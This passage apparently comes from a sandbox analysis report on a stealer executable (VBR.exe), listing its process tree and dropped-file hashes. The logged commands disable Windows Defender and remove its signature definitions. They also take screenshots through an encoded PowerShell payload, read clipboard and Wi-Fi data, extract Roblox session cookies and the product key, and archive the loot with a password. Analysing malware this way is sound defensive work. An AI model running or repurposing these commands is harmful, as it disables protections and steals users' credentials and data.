                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:4676
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                            3⤵
                                                              PID:1752
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic path win32_VideoController get name
                                                                4⤵
                                                                • Detects videocard installed
                                                                PID:2856
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                              3⤵
                                                                PID:4256
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                  4⤵
                                                                    PID:816
                                                            • C:\Windows\System32\rundll32.exe
                                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                              1⤵
                                                                PID:3048
                                                              • C:\Users\Admin\AppData\Local\Temp\VBR.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\VBR.exe"
                                                                1⤵
                                                                  PID:932
                                                                  • C:\Users\Admin\AppData\Local\Temp\VBR.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\VBR.exe"
                                                                    2⤵
                                                                    • Loads dropped DLL
                                                                    PID:1348
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\VBR.exe'"
                                                                      3⤵
                                                                        PID:264
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\VBR.exe'
                                                                          4⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          PID:5380
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                        3⤵
                                                                          PID:1620
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                            4⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            PID:3456
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                          3⤵
                                                                            PID:5836
                                                                            • C:\Windows\system32\tasklist.exe
                                                                              tasklist /FO LIST
                                                                              4⤵
                                                                              • Enumerates processes with tasklist
                                                                              PID:6032
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                            3⤵
                                                                              PID:5952
                                                                              • C:\Windows\system32\tasklist.exe
                                                                                tasklist /FO LIST
                                                                                4⤵
                                                                                • Enumerates processes with tasklist
                                                                                PID:2664
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                              3⤵
                                                                                PID:6116
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                  4⤵
                                                                                    PID:5084
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                  3⤵
                                                                                  • Clipboard Data
                                                                                  PID:6048
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Get-Clipboard
                                                                                    4⤵
                                                                                    • Clipboard Data
                                                                                    PID:5420
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                  3⤵
                                                                                    PID:3104
                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                      tasklist /FO LIST
                                                                                      4⤵
                                                                                      • Enumerates processes with tasklist
                                                                                      PID:1752
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                    3⤵
                                                                                      PID:4228
                                                                                      • C:\Windows\system32\tree.com
                                                                                        tree /A /F
                                                                                        4⤵
                                                                                          PID:4160
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                        3⤵
                                                                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                        PID:4252
                                                                                        • C:\Windows\system32\netsh.exe
                                                                                          netsh wlan show profile
                                                                                          4⤵
                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                          PID:1108
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                        3⤵
                                                                                          PID:2252
                                                                                          • C:\Windows\system32\systeminfo.exe
                                                                                            systeminfo
                                                                                            4⤵
                                                                                            • Gathers system information
                                                                                            PID:4956
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                          3⤵
                                                                                            PID:5556
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                              4⤵
                                                                                                PID:2012
                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fwv3aefo\fwv3aefo.cmdline"
                                                                                                  5⤵
                                                                                                    PID:5580
                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A6D.tmp" "c:\Users\Admin\AppData\Local\Temp\fwv3aefo\CSC9BB8E46D47C4E3A91C56BC4A8C7661F.TMP"
                                                                                                      6⤵
                                                                                                        PID:5788
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                  3⤵
                                                                                                    PID:5332
                                                                                                    • C:\Windows\system32\tree.com
                                                                                                      tree /A /F
                                                                                                      4⤵
                                                                                                        PID:3780
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                      3⤵
                                                                                                        PID:4540
                                                                                                        • C:\Windows\system32\tree.com
                                                                                                          tree /A /F
                                                                                                          4⤵
                                                                                                            PID:4348
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                          3⤵
                                                                                                            PID:5652
                                                                                                            • C:\Windows\system32\tree.com
                                                                                                              tree /A /F
                                                                                                              4⤵
                                                                                                                PID:1632
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                              3⤵
                                                                                                                PID:5868
                                                                                                                • C:\Windows\system32\tree.com
                                                                                                                  tree /A /F
                                                                                                                  4⤵
                                                                                                                    PID:5808
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                  3⤵
                                                                                                                    PID:5912
                                                                                                                    • C:\Windows\system32\tree.com
                                                                                                                      tree /A /F
                                                                                                                      4⤵
                                                                                                                        PID:5956
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                      3⤵
                                                                                                                        PID:5364
                                                                                                                        • C:\Windows\system32\getmac.exe
                                                                                                                          getmac
                                                                                                                          4⤵
                                                                                                                            PID:1312
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                          3⤵
                                                                                                                            PID:5560
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                              4⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:5996
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                            3⤵
                                                                                                                              PID:4000
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                4⤵
                                                                                                                                  PID:5784
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI9322\rar.exe a -r -hp"tadyleak" "C:\Users\Admin\AppData\Local\Temp\fhTkO.zip" *"
                                                                                                                                3⤵
                                                                                                                                  PID:3780
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    4⤵
                                                                                                                                      PID:5332
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI9322\rar.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\_MEI9322\rar.exe a -r -hp"tadyleak" "C:\Users\Admin\AppData\Local\Temp\fhTkO.zip" *
                                                                                                                                      4⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5776
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                    3⤵
                                                                                                                                      PID:6020
                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                        wmic os get Caption
                                                                                                                                        4⤵
                                                                                                                                          PID:3016
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                        3⤵
                                                                                                                                          PID:1556
                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                            wmic computersystem get totalphysicalmemory
                                                                                                                                            4⤵
                                                                                                                                              PID:5680
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                            3⤵
                                                                                                                                              PID:3452
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                4⤵
                                                                                                                                                  PID:1632
                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                  wmic csproduct get uuid
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4256
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1820
                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5652
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                        4⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        PID:3964
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4508
                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                          wmic path win32_VideoController get name
                                                                                                                                                          4⤵
                                                                                                                                                          • Detects videocard installed
                                                                                                                                                          PID:4968
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:6000
                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5912
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5900

                                                                                                                                                        Network

                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                        Replay Monitor

                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                        Downloads

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          8740e7db6a0d290c198447b1f16d5281

                                                                                                                                                          SHA1

                                                                                                                                                          ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                                                                                                                          SHA256

                                                                                                                                                          f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                                                                                                                          SHA512

                                                                                                                                                          d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6IJLDY7V\k2[1].rar

                                                                                                                                                          Filesize

                                                                                                                                                          4B

                                                                                                                                                          MD5

                                                                                                                                                          d3b07384d113edec49eaa6238ad5ff00

                                                                                                                                                          SHA1

                                                                                                                                                          f1d2d2f924e986ac86fdf7b36c94bcdf32beec15

                                                                                                                                                          SHA256

                                                                                                                                                          b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c

                                                                                                                                                          SHA512

                                                                                                                                                          0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                          Filesize

                                                                                                                                                          1KB

                                                                                                                                                          MD5

                                                                                                                                                          022ead6083654165139e9270d7698fbc

                                                                                                                                                          SHA1

                                                                                                                                                          f3609375d2daf01e0a01b1345f4bf193c995c758

                                                                                                                                                          SHA256

